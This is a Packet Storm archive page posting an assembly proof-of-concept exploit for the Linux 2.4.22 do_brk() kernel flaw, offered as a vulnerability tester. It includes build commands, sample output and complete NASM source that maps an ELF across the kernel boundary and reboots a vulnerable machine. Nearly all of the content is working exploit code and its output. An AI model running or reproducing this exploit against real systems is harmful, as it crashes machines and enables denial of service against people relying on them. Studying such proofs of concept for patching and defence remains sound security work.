what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

brk_poc.asm

brk_poc.asm
Posted Dec 3, 2003
Authored by Christophe Devine

Linux kernel v2.4.22 and below do_brk() proof of concept exploit written in ASM which tests for the vulnerability, rebooting your system if it is found. Requires nasm greater than v0.98.36, tested with nasm 0.98.38.

tags | exploit, kernel, proof of concept
systems | linux
SHA-256 | 3a1805e87c6665a847a70d41034ba9ce9bf3fd72bd1dea9674ecaa0b343b4333

brk_poc.asm

Change Mirror Download


The following program can be used to test if a x86 Linux system
is vulnerable to the do_brk() exploit; use at your own risk.

$ nasm brk_poc.asm -o a.out
$ chmod 755 a.out

$ uname -a
Linux test3 2.4.22-10mdk #1 Thu Sep 18 12:30:58 CEST 2003 i686 unknown unknown GNU/Linux
$ ./a.out &
[1] 1698
$ cat /proc/`pidof a.out`/maps
bffff000-c0000000 rwxp 00000000 03:03 376860 /tmp/a.out
c0000000-c0003000 rwxp 00000000 00:00 0

(system reboots when the program exits)

$ uname -a
Linux test3 2.4.23 #1 Mon Dec 1 22:18:25 CET 2003 i686 unknown unknown GNU/Linux
$ ./a.out &
[1] 1591
$ cat /proc/`pidof a.out`/maps
bffff000-c0000000 rwxp 00000000 03:03 376860 /tmp/a.out

(the program exits gracefully)

$ cat brk_poc.asm

; ref.: http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html

BITS 32

org 0xBFFFF000

ehdr: ; Elf32_Ehdr
db 0x7F, "ELF", 1, 1, 1 ; e_ident
times 9 db 0
dw 2 ; e_type
dw 3 ; e_machine
dd 1 ; e_version
dd _start ; e_entry
dd phdr - $$ ; e_phoff
dd 0 ; e_shoff
dd 0 ; e_flags
dw ehdrsize ; e_ehsize
dw phdrsize ; e_phentsize
dw 1 ; e_phnum
dw 0 ; e_shentsize
dw 0 ; e_shnum
dw 0 ; e_shstrndx

ehdrsize equ $ - ehdr

phdr: ; Elf32_Phdr
dd 1 ; p_type
dd 0 ; p_offset
dd $$ ; p_vaddr
dd $$ ; p_paddr
dd filesize ; p_filesz
dd 0x4000 ; p_memsz
dd 7 ; p_flags
dd 0x1000 ; p_align


phdrsize equ $ - phdr

_start:

mov eax, 162
mov ebx, timespec
int 0x80

mov eax, 1
mov ebx, 0
int 0x80

timespec dd 20,0

filesize equ $ - $$

--
Christophe Devine - http://www.cr0.net:8040/about/
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    0 Files
  • 5
    Mar 5th
    0 Files
  • 6
    Mar 6th
    0 Files
  • 7
    Mar 7th
    0 Files
  • 8
    Mar 8th
    0 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    0 Files
  • 12
    Mar 12th
    0 Files
  • 13
    Mar 13th
    0 Files
  • 14
    Mar 14th
    0 Files
  • 15
    Mar 15th
    0 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    0 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close